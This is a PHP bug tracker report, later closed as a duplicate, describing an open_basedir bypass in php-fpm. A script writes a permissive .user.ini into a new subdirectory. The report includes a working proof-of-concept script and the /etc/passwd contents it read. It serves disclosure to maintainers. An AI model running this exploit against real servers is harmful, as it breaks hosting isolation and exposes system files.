|
|
php.net | support | documentation | report a bug | advanced search | search howto | statistics | random bug | login |
PatchesPull RequestsHistoryAllCommentsChangesGit/SVN commits
[2016-05-29 08:37 UTC] remi@php.net
-Status: Open
+Status: Duplicate
[2016-05-29 08:37 UTC] remi@php.net
|
|||||||||||||||||||||||||||
Copyright © 2001-2024 The PHP GroupAll rights reserved. |
Last updated: Fri Apr 26 05:01:30 2024 UTC |
Description: ------------ On php-fpm we could set the open_basedir by ".user.ini". For example, I have "open_basedir=/var/www/html/" in /var/www/html/.user.ini. I means all the phps in /var/www/html/ should obey the rules. Unfortunately, the setting could be overwritten. I could create a directory "attack" and put "open_basedir=/" in /var/www/html/attack/.user.ini and the phps in /var/www/html/attack/ could bypass the open_basedir set by "/var/www/html/.user.ini". What's more, all these things could be done in a evil php which is located in /var/www/html/. (It's important that the evil php and .user.ini are in the same directory and the evil php could ignore the setting set by .user.ini) The exp below shows a example how to bypass the open_basedir setting and successfully read the file. Test script: --------------- <?php @set_time_limit(0); @ignore_user_abort(true); @ini_set('max_execution_time', 0); echo "normal<br>"; echo file_get_contents("/etc/passwd"); echo "<br><br>"; echo "attack<br>"; mkdir("attack/",0777); file_put_contents("attack/.user.ini","open_basedir=/"); file_put_contents("attack/attack.php",'<?php echo file_get_contents("/etc/passwd");'); sleep(ini_get("user_ini.cache_ttl")+1); $url=$_SERVER['REQUEST_SCHEME'].'://'.$_SERVER["HTTP_HOST"].$_SERVER["REQUEST_URI"]; $url=dirname($url)."/attack/attack.php"; echo file_get_contents($url); ?> Expected result: ---------------- I should not see any output. normal attack Actual result: -------------- The exp successfully read the file. normal attack root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-timesync:x:100:103:systemd Time Synchronization,,,:/run/systemd:/bin/false systemd-network:x:101:104:systemd Network Management,,,:/run/systemd/netif:/bin/false systemd-resolve:x:102:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false systemd-bus-proxy:x:103:106:systemd Bus Proxy,,,:/run/systemd:/bin/false syslog:x:104:109::/home/syslog:/bin/false messagebus:x:105:110::/var/run/dbus:/bin/false uuidd:x:106:111::/run/uuidd:/bin/false sshd:x:107:65534::/var/run/sshd:/usr/sbin/nologin